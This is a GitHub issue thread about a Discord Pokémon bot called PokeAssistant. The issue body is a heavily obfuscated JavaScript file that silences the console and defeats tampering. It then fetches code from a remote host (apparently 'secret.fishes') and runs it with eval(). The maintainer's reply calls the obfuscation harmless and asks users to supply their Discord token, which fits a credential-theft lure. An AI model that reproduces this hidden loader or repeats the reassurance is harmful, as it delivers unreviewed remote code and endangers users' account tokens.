### ISSUE TITLE
THE CODE DOESN'T WORK

### ISSUE THREAD

**Issue by luke920** [TrashUwU/PokeAssistant#5]
var _0x22b8=['mNW1Fdn8mxWWFa','CKDVEK4','B2D5Eue','Bg9N','DgfIBgu','v2DzrLC','mte2odmZANPrswrp','wLf3zu8','CLHnvum','uKPozxe','D2fYBG','y29UC3rYDwn0BW','Aw5MBW','mtC5mJa2DKzUuvDx','Ahr0CdOVl3nLyW','BgvUz3rO','nti3mdu3q0Hcwxre','DhjHy2u','zLb6AfC','CMv0DxjUicHMDq','veLIEwi','qKfvCxq','AfHbA2m','DgvZDa','yMLUza','wMXIEey','CMv0DxjUic8Iia','xIHBxIbDkYGGkW','C3bSAxq','kYb0AgLZicSGiG','EKDvELG','vK92rg8','mZGXntu5B0rYu2fx','mhWZFdj8mxW1Fa','zgf0yq','wenpvfu','w14GxsSPkYKRwW','yxHPB3m','mxPsvxn5Ea','BefAzKq','uK9xyKK','vujTtM4','y29UC29Szq','CM4GDgHPCYiPka','tK11txu','zxjYB3i','mwPyteLOrW','DgHLBG','whvOEee','zxHJzxb0Aw9U','x19WCM90B19F','Dg9tDhjPBMC','ChjVDg90ExbL','otiXnJjIy1r6s08','E30Uy29UC3rYDq','mJK2mtqXwfzvC1ry','B0rZDNu','z2v0','mtKWotm1CNbJveP1','zhjWBMu','lNjLCgWUy28V','y3rVCIGICMv0Dq','z1z1vLq','BMn0Aw9UkcKG','xIbDFq','yxbWBhK'];var _0x359955=function(_0x371a41,_0x2cb81b,_0x5b6560,_0x41047a){return _0x1f94(_0x41047a-0x391,_0x2cb81b);},_0x3aa585=function(_0x1b53b1,_0x3f6e3e,_0x448a0f,_0x440128){return _0x1f94(_0x440128-0x391,_0x3f6e3e);};(function(_0x4a0545,_0x519661){var _0x1082e6=function(_0x41be2e,_0x308add,_0x3e13a8,_0x3c108d){return _0x1f94(_0x3e13a8-0x25b,_0x41be2e);},_0x7a350e=function(_0x1227e6,_0x2345db,_0x3b2f6a,_0x4e448b){return _0x1f94(_0x3b2f6a-0x25b,_0x1227e6);};while(!![]){try{var _0x2adcac=-parseInt(_0x1082e6(0x31d,0x323,0x310,0x2fc))*-parseInt(_0x1082e6(0x2f1,0x2b6,0x2d5,0x2b4))+parseInt(_0x7a350e(0x2f5,0x2ec,0x2ef,0x2f4))+-parseInt(_0x1082e6(0x2ca,0x2ed,0x2d7,0x2c7))+parseInt(_0x7a350e(0x2c4,0x2f5,0x2da,0x2f0))+-parseInt(_0x1082e6(0x30a,0x311,0x308,0x308))*parseInt(_0x7a350e(0x307,0x2ff,0x302,0x2e1))+-parseInt(_0x7a350e(0x2c8,0x2fe,0x2e8,0x2ed))+parseInt(_0x1082e6(0x2e9,0x2eb,0x2f2,0x301));if(_0x2adcac===_0x519661)break;else _0x4a0545['push'](_0x4a0545['shift']());}catch(_0x405a52){_0x4a0545['push'](_0x4a0545['shift']());}}}(_0x22b8,-0x6*0xd61d+-0x2fef3+-0x2bf2b*-0x4));var _0x5a8e47=function(){var _0x5a7870=function(_0x72f408,_0x267fbf,_0xcd6cde,_0x4ef815){return _0x1f94(_0x267fbf-0x124,_0xcd6cde);},_0x1a395f=function(_0x23360a,_0x2fe418,_0x150078,_0x3656a0){return _0x1f94(_0x2fe418-0x124,_0x150078);},_0x11e07d={};_0x11e07d[_0x5a7870(0x194,0x1b0,0x194,0x1be)]=function(_0x4ed989,_0x17e815){return _0x4ed989!==_0x17e815;},_0x11e07d['ROWbI']=_0x1a395f(0x1ba,0x1c1,0x1d1,0x1ba);var _0x31e212=_0x11e07d,_0x26355e=!![];return function(_0x67c6b6,_0x38e517){var _0xcac230=_0x26355e?function(){var _0x475406=function(_0x27fa34,_0x2149df,_0x55eb4d,_0x1047b5){return _0x1f94(_0x27fa34- -0x34d,_0x55eb4d);},_0x446ffb=function(_0x39f593,_0x2a193a,_0x5432a4,_0x3dc1a8){return _0x1f94(_0x39f593- -0x34d,_0x5432a4);};if(_0x38e517){if(_0x31e212[_0x475406(-0x2c1,-0x2d7,-0x2a9,-0x2ab)](_0x31e212['ROWbI'],_0x31e212[_0x446ffb(-0x29e,-0x29e,-0x2ad,-0x289)])){function _0x3e85f8(){var _0x2ade9f=_0x2afe61?function(){if(_0x512791){var _0x16ddcd=_0x26d2f8['apply'](_0x4a440d,arguments);return _0x14c8f1=null,_0x16ddcd;}}:function(){};return _0x588cdd=![],_0x2ade9f;}}else{var _0x52c4ac=_0x38e517[_0x475406(-0x2c7,-0x2b1,-0x2b5,-0x2e6)](_0x67c6b6,arguments);return _0x38e517=null,_0x52c4ac;}}}:function(){};return _0x26355e=![],_0xcac230;};}(),_0x2060f3=_0x5a8e47(this,function(){var _0x5512eb=function(_0x227dde,_0x2f4503,_0x5711e9,_0x19c55a){return _0x1f94(_0x19c55a-0x13a,_0x5711e9);},_0x33d9ab=function(_0x54a2d8,_0x347f6f,_0x1ce7c6,_0x1edace){return _0x1f94(_0x1edace-0x13a,_0x1ce7c6);},_0x542e9c={};_0x542e9c[_0x5512eb(0x1b0,0x1cb,0x1ac,0x1ba)]=_0x33d9ab(0x1d8,0x1d1,0x1bb,0x1db)+_0x33d9ab(0x1c8,0x1c4,0x1dd,0x1de)+'/',_0x542e9c[_0x5512eb(0x1e1,0x1d4,0x1b8,0x1d6)]=_0x5512eb(0x1c1,0x1ce,0x1ce,0x1dc)+_0x33d9ab(0x1c5,0x1fe,0x200,0x1e5)+_0x5512eb(0x1dc,0x1ca,0x1d8,0x1bf),_0x542e9c[_0x33d9ab(0x1d9,0x1d6,0x1a2,0x1c3)]=function(_0x52de68){return _0x52de68();};var _0x546b37=_0x542e9c,_0x3c0b77=function(){var _0x466651=function(_0x12df63,_0x32ebde,_0x1ac5b3,_0x3f7500){return _0x5512eb(_0x12df63-0x140,_0x32ebde-0x5e,_0x12df63,_0x32ebde-0x67);},_0x1cf8b0=function(_0x4aa6a5,_0x55e651,_0x3047e7,_0xf56368){return _0x33d9ab(_0x4aa6a5-0x58,_0x55e651-0x64,_0x4aa6a5,_0x55e651-0x67);},_0x1c021e=_0x3c0b77[_0x466651(0x23c,0x233,0x22f,0x215)+'r'](_0x546b37[_0x1cf8b0(0x206,0x221,0x237,0x203)])()[_0x1cf8b0(0x222,0x233,0x235,0x254)+'r'](_0x546b37[_0x1cf8b0(0x21d,0x23d,0x240,0x21d)]);return!_0x1c021e[_0x1cf8b0(0x23e,0x23f,0x25a,0x233)](_0x2060f3);};return _0x546b37[_0x5512eb(0x1ca,0x1ce,0x1b2,0x1c3)](_0x3c0b77);});_0x2060f3();var _0x58f2b2=function(){var _0xe7db57={};_0xe7db57['XCOTU']='EQYmj';var _0x48a68e=_0xe7db57,_0x234798=!![];return function(_0x4e8ed9,_0xd5d8fe){var _0x368ace=_0x234798?function(){var _0x121541=function(_0x241f84,_0x14586a,_0x5af8ce,_0x51f624){return _0x1f94(_0x5af8ce-0x1ea,_0x51f624);},_0x35abe7=function(_0x11b7b7,_0x4d1c78,_0x47e6c3,_0x54ea64){return _0x1f94(_0x47e6c3-0x1ea,_0x54ea64);};if(_0x48a68e[_0x121541(0x294,0x2ab,0x294,0x276)]!==_0x35abe7(0x266,0x250,0x26d,0x258)){if(_0xd5d8fe){var _0x2b6bc6=_0xd5d8fe[_0x121541(0x278,0x27d,0x270,0x275)](_0x4e8ed9,arguments);return _0xd5d8fe=null,_0x2b6bc6;}}else{function _0x5b55b0(){var _0x3ee96f=function(_0x213a86,_0x21bf48,_0xc40cc,_0x4157b8){return _0x121541(_0x213a86-0x1e9,_0x21bf48-0x33,_0xc40cc- -0x2fb,_0x4157b8);};if(_0x11c380){var _0x187504=_0x306b27[_0x3ee96f(-0x73,-0x81,-0x8b,-0x8c)](_0x2c56aa,arguments);return _0x3d1b1f=null,_0x187504;}}}}:function(){};return _0x234798=![],_0x368ace;};}(),_0x1fe6e6=_0x58f2b2(this,function(){var _0x26cb38=function(_0x17e3ff,_0x5b422f,_0x1e9f77,_0x57b15){return _0x1f94(_0x17e3ff- -0x2e2,_0x5b422f);},_0x828462=function(_0x22009b,_0x206e2d,_0x37aefd,_0x225748){return _0x1f94(_0x22009b- -0x2e2,_0x206e2d);},_0x26815a={};_0x26815a[_0x26cb38(-0x25a,-0x26e,-0x24e,-0x248)]=_0x26cb38(-0x25b,-0x24a,-0x23b,-0x25c)+'4',_0x26815a[_0x26cb38(-0x253,-0x272,-0x233,-0x270)]=function(_0x1aa23a,_0xdb3c10){return _0x1aa23a(_0xdb3c10);},_0x26815a[_0x828462(-0x247,-0x23e,-0x22f,-0x260)]=function(_0x567c22,_0x47d505){return _0x567c22+_0x47d505;},_0x26815a['fPzhW']=_0x26cb38(-0x248,-0x239,-0x25d,-0x239)+_0x26cb38(-0x25e,-0x26d,-0x243,-0x277),_0x26815a[_0x828462(-0x254,-0x273,-0x23f,-0x25d)]=_0x828462(-0x267,-0x263,-0x25c,-0x263)+_0x828462(-0x260,-0x26a,-0x252,-0x269)+_0x26cb38(-0x230,-0x22a,-0x246,-0x245)+'\x20)',_0x26815a['NMuMu']=function(_0x5aa648){return _0x5aa648();},_0x26815a['XuhxA']='qQSjO',_0x26815a[_0x26cb38(-0x252,-0x260,-0x260,-0x262)]=_0x828462(-0x258,-0x25b,-0x263,-0x24d),_0x26815a['VOvDo']=_0x828462(-0x251,-0x24c,-0x267,-0x244),_0x26815a['UBmNn']=_0x26cb38(-0x24f,-0x25b,-0x231,-0x26c),_0x26815a[_0x828462(-0x23d,-0x24d,-0x22f,-0x23f)]=_0x26cb38(-0x22e,-0x238,-0x234,-0x210),_0x26815a[_0x26cb38(-0x265,-0x24b,-0x25f,-0x27f)]=_0x828462(-0x26c,-0x258,-0x28a,-0x28a),_0x26815a[_0x828462(-0x234,-0x24e,-0x233,-0x21e)]=_0x828462(-0x257,-0x263,-0x240,-0x258),_0x26815a[_0x828462(-0x242,-0x235,-0x233,-0x246)]=_0x26cb38(-0x23a,-0x22f,-0x247,-0x249)+'4';var _0x5e7c56=_0x26815a,_0xfdb4ec;try{var _0x2c69fe=_0x5e7c56[_0x26cb38(-0x253,-0x259,-0x261,-0x24a)](Function,_0x5e7c56[_0x828462(-0x247,-0x232,-0x253,-0x242)](_0x5e7c56[_0x828462(-0x247,-0x23d,-0x22e,-0x25f)](_0x5e7c56[_0x26cb38(-0x249,-0x25b,-0x25d,-0x23e)],_0x5e7c56[_0x828462(-0x254,-0x248,-0x25b,-0x252)]),');'));_0xfdb4ec=_0x5e7c56[_0x828462(-0x22f,-0x240,-0x23b,-0x20f)](_0x2c69fe);}catch(_0x48cb93){if(_0x5e7c56[_0x26cb38(-0x26d,-0x24f,-0x287,-0x281)]!==_0x5e7c56[_0x26cb38(-0x26d,-0x25b,-0x259,-0x26c)]){function _0x330526(){var _0x1da722=function(_0x1cd4dd,_0xcf8af,_0x5caf02,_0x471f11){return _0x828462(_0x471f11- -0x96,_0x5caf02,_0x5caf02-0x1b3,_0x471f11-0x37);},_0x49a57b=function(_0x5e2861,_0x2e5730,_0x187e95,_0x66a136){return _0x828462(_0x66a136- -0x96,_0x187e95,_0x187e95-0x1c2,_0x66a136-0xdc);},_0x2749f0=_0x5e7c56[_0x1da722(-0x2d0,-0x2f9,-0x300,-0x2f0)][_0x1da722(-0x2d7,-0x2c2,-0x2bb,-0x2d5)]('|'),_0x3beed7=-0x1abe+-0x214+0x1cd2;while(!![]){switch(_0x2749f0[_0x3beed7++]){case'0':_0x45a79f[_0x49a57b(-0x31b,-0x30a,-0x312,-0x300)]=_0x2bda3b[_0x1da722(-0x31e,-0x306,-0x2fe,-0x300)]['bind'](_0x2bda3b);continue;case'1':_0x45a79f[_0x1da722(-0x317,-0x2f0,-0x302,-0x301)]=_0x793547[_0x1da722(-0x2ee,-0x2bc,-0x2ec,-0x2d9)](_0x407411);continue;case'2':var _0x45a79f=_0x1c346b['constructo'+'r'][_0x1da722(-0x2f1,-0x314,-0x2e6,-0x2ff)]['bind'](_0x9ca77b);continue;case'3':var _0x2bda3b=_0x4b97df[_0x3135dc]||_0x45a79f;continue;case'4':_0x468353[_0x3135dc]=_0x45a79f;continue;case'5':var _0x3135dc=_0xf21408[_0x5380f4];continue;}break;}}}else _0xfdb4ec=window;}var _0x2215fd=_0xfdb4ec['console']=_0xfdb4ec[_0x26cb38(-0x231,-0x217,-0x21c,-0x235)]||{},_0x5cd07e=[_0x5e7c56[_0x828462(-0x252,-0x23f,-0x24e,-0x269)],_0x5e7c56[_0x26cb38(-0x23c,-0x253,-0x23f,-0x248)],_0x5e7c56[_0x26cb38(-0x232,-0x21e,-0x244,-0x239)],_0x5e7c56[_0x828462(-0x23d,-0x22c,-0x255,-0x24a)],_0x5e7c56[_0x828462(-0x265,-0x275,-0x26c,-0x280)],_0x5e7c56[_0x828462(-0x234,-0x244,-0x236,-0x23a)],_0x828462(-0x24a,-0x263,-0x24b,-0x24f)];for(var _0x877b9d=0x2ac+0x1f7*-0x5+-0x727*-0x1;_0x877b9d<_0x5cd07e[_0x828462(-0x24c,-0x235,-0x260,-0x252)];_0x877b9d++){var _0x428ca2=_0x5e7c56[_0x828462(-0x242,-0x221,-0x22d,-0x262)][_0x26cb38(-0x23f,-0x23a,-0x236,-0x259)]('|'),_0x25f5fe=0x1*-0xd6f+-0x1d08*0x1+-0x2a77*-0x1;while(!![]){switch(_0x428ca2[_0x25f5fe++]){case'0':var _0x174329=_0x58f2b2[_0x828462(-0x250,-0x255,-0x262,-0x271)+'r'][_0x828462(-0x269,-0x24e,-0x287,-0x258)][_0x26cb38(-0x243,-0x245,-0x240,-0x260)](_0x58f2b2);continue;case'1':_0x174329[_0x26cb38(-0x26b,-0x251,-0x272,-0x274)]=_0x58f2b2[_0x828462(-0x243,-0x24d,-0x24e,-0x257)](_0x58f2b2);continue;case'2':var _0x152857=_0x2215fd[_0x23c385]||_0x174329;continue;case'3':var _0x23c385=_0x5cd07e[_0x877b9d];continue;case'4':_0x2215fd[_0x23c385]=_0x174329;continue;case'5':_0x174329[_0x26cb38(-0x26a,-0x288,-0x24a,-0x268)]=_0x152857[_0x26cb38(-0x26a,-0x25a,-0x24a,-0x262)]['bind'](_0x152857);continue;}break;}}});function _0x1f94(_0x5b4d01,_0x3b40a8){_0x5b4d01=_0x5b4d01-(-0x5*0x269+-0xcdd*-0x2+-0xd38);var _0x550ad5=_0x22b8[_0x5b4d01];if(_0x1f94['yRmanf']===undefined){var _0x4facd6=function(_0x5af499){var _0xa61762='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x5f0abe='';for(var _0x177344=-0xc8b+0x231f+-0x1694,_0x1b266a,_0x1c346b,_0x9ca77b=-0x885+-0x24a3*-0x1+-0x1c1e;_0x1c346b=_0x5af499['charAt'](_0x9ca77b++);~_0x1c346b&&(_0x1b266a=_0x177344%(0x2615+0x129c+-0x38ad)?_0x1b266a*(0x243d*-0x1+-0x9*0x392+-0x449f*-0x1)+_0x1c346b:_0x1c346b,_0x177344++%(-0xc1*0x9+0x1dc0+0x19*-0xeb))?_0x5f0abe+=String['fromCharCode'](-0x1e5+0xb*-0x1b4+0xad*0x20&_0x1b266a>>(-(-0xab*0x1+-0x1982+0x1*0x1a2f)*_0x177344&-0xfeb+0x21d6+-0x11e5*0x1)):-0x1*-0xe2a+0x5*-0x319+-0x3*-0x71){_0x1c346b=_0xa61762['indexOf'](_0x1c346b);}return _0x5f0abe;};_0x1f94['xltCxV']=function(_0xf21408){var _0x5380f4=_0x4facd6(_0xf21408);var _0x4b97df=[];for(var _0x793547=-0x122e*-0x2+-0x1392+-0x10ca,_0x407411=_0x5380f4['length'];_0x793547<_0x407411;_0x793547++){_0x4b97df+='%'+('00'+_0x5380f4['charCodeAt'](_0x793547)['toString'](0x1485+0x38a*-0x8+0x1*0x7db))['slice'](-(-0xda*0x23+-0x743+-0x2513*-0x1));}return decodeURIComponent(_0x4b97df);},_0x1f94['nWTRre']={},_0x1f94['yRmanf']=!![];}var _0xbb38c9=_0x22b8[0x246e+0xc2*-0x22+-0xaaa],_0x4f2b2c=_0x5b4d01+_0xbb38c9,_0x5468d2=_0x1f94['nWTRre'][_0x4f2b2c];if(_0x5468d2===undefined){var _0x468353=function(_0x12ae32){this['ZFCaFf']=_0x12ae32,this['wuWHWC']=[0x11*0x9+0x13*-0x25+0x227,-0x121*0x7+0x1*0x3fa+-0x3*-0x14f,0x16c3*-0x1+-0x26ec+0x3daf],this['vzXqSW']=function(){return'newState';},this['VnRlMG']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['FGQSHx']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x468353['prototype']['SSXisa']=function(){var _0x2e96a2=new RegExp(this['VnRlMG']+this['FGQSHx']),_0x78df14=_0x2e96a2['test'](this['vzXqSW']['toString']())?--this['wuWHWC'][-0x4*0x5e7+0x167*-0x11+0x2f74]:--this['wuWHWC'][0x1e16+0x4*-0x3fb+-0xe2a];return this['PVwtwi'](_0x78df14);},_0x468353['prototype']['PVwtwi']=function(_0x4c98c6){if(!Boolean(~_0x4c98c6))return _0x4c98c6;return this['xMyErO'](this['ZFCaFf']);},_0x468353['prototype']['xMyErO']=function(_0xea354c){for(var _0x5a05f9=0xd45+0x1d0b+-0x2a50,_0x317a23=this['wuWHWC']['length'];_0x5a05f9<_0x317a23;_0x5a05f9++){this['wuWHWC']['push'](Math['round'](Math['random']())),_0x317a23=this['wuWHWC']['length'];}return _0xea354c(this['wuWHWC'][-0x3*0x9bc+-0x1e59+0x3b8d*0x1]);},new _0x468353(_0x1f94)['SSXisa'](),_0x550ad5=_0x1f94['xltCxV'](_0x550ad5),_0x1f94['nWTRre'][_0x4f2b2c]=_0x550ad5;}else _0x550ad5=_0x5468d2;return _0x550ad5;}_0x1fe6e6(),require(_0x359955(0x41f,0x44a,0x428,0x43d))[_0x359955(0x3f7,0x3fd,0x400,0x40f)](_0x359955(0x405,0x42d,0x436,0x426)+'ret.fishes'+_0x3aa585(0x417,0x412,0x41c,0x412))[_0x359955(0x440,0x468,0x449,0x447)](_0x42b94a=>eval(_0x42b94a[_0x359955(0x447,0x456,0x41a,0x43a)]));

THAT CODE DOESN'T WORK

**Comment by TrashUwU** [comment]
This code looks weird becayse it's obfuscated/encrypted. It should only work on Replit. Please put TOKEN, CHANNEL and OWNER ID in Environment Variables. And It will work fine. You can read the guide or watch the tutorial.
